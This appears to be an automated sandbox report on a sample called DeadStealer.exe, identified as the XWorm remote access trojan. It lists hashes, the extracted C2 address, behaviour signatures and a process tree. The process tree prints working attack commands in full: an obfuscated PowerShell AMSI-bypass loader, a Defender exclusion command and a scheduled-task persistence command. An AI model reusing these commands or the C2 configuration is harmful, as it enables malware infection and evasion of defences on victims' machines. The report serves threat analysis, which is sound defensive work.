Analysis

  • max time kernel
    37s
  • max time network
    83s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19/09/2024, 03:43

General

  • Target

    DeadStealer.exe

  • Size

    4.3MB

  • MD5

    c4a908dcbd6e7e233dd9b8262c94ac39

  • SHA1

    bb2a46603908e118dbbb1c74fd377f4e5427e3fe

  • SHA256

    a4beca9447f15277f11843a2109ce49e0f4c69055e2c17ed60d59e24cefea82a

  • SHA512

    d71213e64a4f0a2071e8d5c782debb35ddd4788c7eb0c155497f40c7b5710417ce1d7a553758edeee95bf0ca68825386da2557bda4ead95191d4b7c8515bb1aa

  • SSDEEP

    98304:RkjozJ9/im8XVBKl6tmJVP2sRx/E0T7zN3HtHOIT4bNJFY3Oqt2SGuA+i1i:tzJpjS346tmJ1ds+7ptHOjBHYm9uAm

Malware Config

Extracted

Family

xworm

Version

3.1

C2

subscribe-bond.gl.at.ply.gg:28600

Mutex

qjVRKNjch8MreOzA

Attributes
  • Install_directory

    %Public%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Obfuscated with Agile.Net obfuscator 8 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:600
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of FindShellTrayWindow
        PID:1012
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{a2afc2a8-fd07-491d-b7a2-b551f34aee5f}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3772
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:652
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
        1⤵
          PID:748
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
          1⤵
            PID:916
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
            1⤵
              PID:328
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
              1⤵
                PID:408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                1⤵
                  PID:596
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                  1⤵
                    PID:1096
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:1104
                      • c:\windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3056
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mJxZtCVPQAPK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HucXNVWNvAYKBw,[Parameter(Position=1)][Type]$vpniheRIvP)$wRzLwZowNGb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+''+[Char](99)+''+'t'+'e'+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+'e'+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+'Cl'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$wRzLwZowNGb.DefineConstructor(''+'R'+''+'T'+'S'+'p'+'e'+'c'+''+'i'+''+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$HucXNVWNvAYKBw).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$wRzLwZowNGb.DefineMethod(''+'I'+''+'n'+'v'+'o'+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+'',$vpniheRIvP,$HucXNVWNvAYKBw).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $wRzLwZowNGb.CreateType();}$cjaMnwRjKvAjS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+'e'+[Char](109)+''+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'ro'+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+[Char](97)+'f'+'e'+'N'+[Char](97)+''+'t'+''+[Char](105)+'v'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+'ds');$sPtLxLYwZTVdRC=$cjaMnwRjKvAjS.GetMethod('G'+[Char](101)+''+[Char](116)+'P'+[Char](114)+'oc'+[Char](65)+''+[Char](100)+''+'d'+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](116)+''+[Char](97)+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NBVkCzpNYvRzedSnpMu=mJxZtCVPQAPK @([String])([IntPtr]);$EruqGDZwUvBgBTOcXWxJFE=mJxZtCVPQAPK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$iWjFoGtbeor=$cjaMnwRjKvAjS.GetMethod(''+'G'+''+'e'+''+[Char](116)+'M'+'o'+''+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+'a'+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+'r'+'ne'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+'ll')));$TWGNueyubeTZBH=$sPtLxLYwZTVdRC.Invoke($Null,@([Object]$iWjFoGtbeor,[Object]('Lo'+[Char](97)+'d'+[Char](76)+'ib'+'r'+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$witYAKNjbnwSjZclk=$sPtLxLYwZTVdRC.Invoke($Null,@([Object]$iWjFoGtbeor,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+'u'+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+'o'+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$uzXmpUc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TWGNueyubeTZBH,$NBVkCzpNYvRzedSnpMu).Invoke('am'+'s'+'i'+[Char](46)+'d'+[Char](108)+''+'l'+'');$AVjEQPeOUrcvYCnyG=$sPtLxLYwZTVdRC.Invoke($Null,@([Object]$uzXmpUc,[Object]('A'+'m'+''+[Char](115)+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+'nB'+'u'+''+[Char](102)+''+'f'+'e'+[Char](114)+'')));$aIyXbGPOUF=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($witYAKNjbnwSjZclk,$EruqGDZwUvBgBTOcXWxJFE).Invoke($AVjEQPeOUrcvYCnyG,[uint32]8,4,[ref]$aIyXbGPOUF);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AVjEQPeOUrcvYCnyG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($witYAKNjbnwSjZclk,$EruqGDZwUvBgBTOcXWxJFE).Invoke($AVjEQPeOUrcvYCnyG,[uint32]8,0x20,[ref]$aIyXbGPOUF);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](68)+''+'e'+''+[Char](97)+''+[Char](100)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:812
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:4844
                          • C:\Users\Public\DeadXClient.exe
                            C:\Users\Public\DeadXClient.exe
                            2⤵
                            • Executes dropped EXE
                            PID:3364
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s nsi
                          1⤵
                            PID:1204
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                            1⤵
                              PID:1216
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                              1⤵
                                PID:1224
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                1⤵
                                  PID:1232
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                  1⤵
                                    PID:1400
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                    1⤵
                                      PID:1468
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                      1⤵
                                        PID:1480
                                        • c:\windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:2920
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                          1⤵
                                            PID:1532
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                            1⤵
                                              PID:1588
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                              1⤵
                                                PID:1664
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1680
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                  1⤵
                                                    PID:1736
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1772
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1784
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                        1⤵
                                                          PID:1864
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                          1⤵
                                                            PID:1872
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:1984
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2020
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                              1⤵
                                                                PID:2284
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                1⤵
                                                                  PID:2340
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                  1⤵
                                                                    PID:2348
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2376
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2396
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                      1⤵
                                                                        PID:2408
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2416
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                        1⤵
                                                                          PID:2432
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                          1⤵
                                                                            PID:2576
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                            1⤵
                                                                              PID:2880
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2940
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                1⤵
                                                                                  PID:3008
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3108
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:3340
                                                                                    • C:\Users\Admin\AppData\Local\Temp\DeadStealer.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\DeadStealer.exe"
                                                                                      2⤵
                                                                                      • Enumerates system info in registry
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4476
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents'
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2188
                                                                                      • C:\Users\Public\Documents\svchost.exe
                                                                                        "C:\Users\Public\Documents\svchost.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2028
                                                                                        • C:\Users\Public\DeadCodeRootKit.exe
                                                                                          "C:\Users\Public\DeadCodeRootKit.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:3192
                                                                                        • C:\Users\Public\DeadXClient.exe
                                                                                          "C:\Users\Public\DeadXClient.exe"
                                                                                          4⤵
                                                                                          • Drops startup file
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2988
                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DeadXClient" /tr "C:\Users\Public\DeadXClient.exe"
                                                                                            5⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:2220
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3864
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:2096
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                        1⤵
                                                                                          PID:4876
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                          1⤵
                                                                                            PID:3580
                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                            1⤵
                                                                                              PID:1608
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                              1⤵
                                                                                                PID:3244
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:4512
                                                                                                • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                  C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:1176
                                                                                                  • C:\Windows\System32\InstallAgent.exe
                                                                                                    C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4412
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                      1⤵
                                                                                                        PID:5088
                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        1⤵
                                                                                                          PID:4128
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          1⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:1708
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                          1⤵
                                                                                                            PID:4376
                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                            1⤵
                                                                                                              PID:1516

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

                                                                                                              Filesize

                                                                                                              14KB

                                                                                                              MD5

                                                                                                              97cea2ecb607d9b8cf79b35ac418cf7f

                                                                                                              SHA1

                                                                                                              54caed4a6fdff3b8fa69b186e5a64eb6be5496b5

                                                                                                              SHA256

                                                                                                              200608d00e3b5083c39c6dd583fc5261f138a9e2711b24c3a72d123002da5266

                                                                                                              SHA512

                                                                                                              a2f688f76bd1d3a2c5c1321c258edd3360ab28af0ea159dff76926ff3733efbf0710a582e7a38e8d3278ead81f80ca4fa913d8af165bca0dff8106b0e93deb4c

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_llterzxl.ix4.ps1

                                                                                                              Filesize

                                                                                                              1B

                                                                                                              MD5

                                                                                                              c4ca4238a0b923820dcc509a6f75849b

                                                                                                              SHA1

                                                                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                              SHA256

                                                                                                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                              SHA512

                                                                                                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                            • C:\Users\Public\DeadCodeRootKit.exe

                                                                                                              Filesize

                                                                                                              151KB

                                                                                                              MD5

                                                                                                              b8479a23c22cf6fc456e197939284069

                                                                                                              SHA1

                                                                                                              b2d98cc291f16192a46f363d007e012d45c63300

                                                                                                              SHA256

                                                                                                              18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f

                                                                                                              SHA512

                                                                                                              786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4

                                                                                                            • C:\Users\Public\DeadXClient.exe

                                                                                                              Filesize

                                                                                                              34KB

                                                                                                              MD5

                                                                                                              0dec47218426dfc9cf63a4074964ac9d

                                                                                                              SHA1

                                                                                                              579d7c8a7156b306b3661cfd156f91ec6bd1ed4d

                                                                                                              SHA256

                                                                                                              d7095de943a18d68425fc62cdcb39add9819fab6089382171138585d98174415

                                                                                                              SHA512

                                                                                                              9bb7da6b0170bcde815a77033e581c1b2a34db2b89205a59a0cd5058f76edda414100bd0ad95f306261f38f894b1b61a26e9a22be383965aeaeaa254fe3e0c09

                                                                                                            • C:\Users\Public\Documents\svchost.exe

                                                                                                              Filesize

                                                                                                              281KB

                                                                                                              MD5

                                                                                                              8960120f7a4b458783331d2fbd75006d

                                                                                                              SHA1

                                                                                                              08582ccda4853bed8e2acb78cc78a1e3ab53000c

                                                                                                              SHA256

                                                                                                              510990b40e42200f2daacf1f1ee3e4a7b14ac10b24cfecd7d35820d99230dc8b

                                                                                                              SHA512

                                                                                                              32bec63ed93e4651d954198e7391a8c48146f44400ec21ccb66959bc30042bca7c33445f80148ecf5472ac6eb06a1cf4880ddf12cba6ca93142795dff9ee3ccd

                                                                                                            • memory/600-133-0x000001C56CAF0000-0x000001C56CB12000-memory.dmp

                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/600-134-0x000001C56CB20000-0x000001C56CB47000-memory.dmp

                                                                                                              Filesize

                                                                                                              156KB

                                                                                                            • memory/600-135-0x000001C56CB20000-0x000001C56CB47000-memory.dmp

                                                                                                              Filesize

                                                                                                              156KB

                                                                                                            • memory/600-141-0x000001C56CB20000-0x000001C56CB47000-memory.dmp

                                                                                                              Filesize

                                                                                                              156KB

                                                                                                            • memory/600-142-0x00007FFA50340000-0x00007FFA50350000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/652-153-0x00007FFA50340000-0x00007FFA50350000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/652-152-0x0000026F771B0000-0x0000026F771D7000-memory.dmp

                                                                                                              Filesize

                                                                                                              156KB

                                                                                                            • memory/652-146-0x0000026F771B0000-0x0000026F771D7000-memory.dmp

                                                                                                              Filesize

                                                                                                              156KB

                                                                                                            • memory/748-164-0x00007FFA50340000-0x00007FFA50350000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/748-163-0x00000178FE290000-0x00000178FE2B7000-memory.dmp

                                                                                                              Filesize

                                                                                                              156KB

                                                                                                            • memory/748-157-0x00000178FE290000-0x00000178FE2B7000-memory.dmp

                                                                                                              Filesize

                                                                                                              156KB

                                                                                                            • memory/812-121-0x00007FFA8EEF0000-0x00007FFA8EF9E000-memory.dmp

                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/812-120-0x00007FFA902B0000-0x00007FFA9048B000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/812-119-0x000002D375850000-0x000002D375878000-memory.dmp

                                                                                                              Filesize

                                                                                                              160KB

                                                                                                            • memory/916-174-0x00000269476D0000-0x00000269476F7000-memory.dmp

                                                                                                              Filesize

                                                                                                              156KB

                                                                                                            • memory/916-175-0x00007FFA50340000-0x00007FFA50350000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/916-168-0x00000269476D0000-0x00000269476F7000-memory.dmp

                                                                                                              Filesize

                                                                                                              156KB

                                                                                                            • memory/1012-179-0x00000223A43A0000-0x00000223A43C7000-memory.dmp

                                                                                                              Filesize

                                                                                                              156KB

                                                                                                            • memory/2028-79-0x0000000000E90000-0x0000000000E96000-memory.dmp

                                                                                                              Filesize

                                                                                                              24KB

                                                                                                            • memory/2028-76-0x0000000000A30000-0x0000000000A7E000-memory.dmp

                                                                                                              Filesize

                                                                                                              312KB

                                                                                                            • memory/2028-77-0x0000000000E80000-0x0000000000E86000-memory.dmp

                                                                                                              Filesize

                                                                                                              24KB

                                                                                                            • memory/2028-78-0x0000000001300000-0x0000000001342000-memory.dmp

                                                                                                              Filesize

                                                                                                              264KB

                                                                                                            • memory/2188-26-0x00007FFA741A0000-0x00007FFA74B8C000-memory.dmp

                                                                                                              Filesize

                                                                                                              9.9MB

                                                                                                            • memory/2188-67-0x00007FFA741A0000-0x00007FFA74B8C000-memory.dmp

                                                                                                              Filesize

                                                                                                              9.9MB

                                                                                                            • memory/2188-37-0x00007FFA741A0000-0x00007FFA74B8C000-memory.dmp

                                                                                                              Filesize

                                                                                                              9.9MB

                                                                                                            • memory/2188-23-0x0000025333710000-0x0000025333732000-memory.dmp

                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/2188-28-0x00000253338E0000-0x0000025333956000-memory.dmp

                                                                                                              Filesize

                                                                                                              472KB

                                                                                                            • memory/2188-24-0x00007FFA741A0000-0x00007FFA74B8C000-memory.dmp

                                                                                                              Filesize

                                                                                                              9.9MB

                                                                                                            • memory/2988-94-0x0000000000970000-0x000000000097E000-memory.dmp

                                                                                                              Filesize

                                                                                                              56KB

                                                                                                            • memory/3772-128-0x00007FFA902B0000-0x00007FFA9048B000-memory.dmp

                                                                                                              Filesize

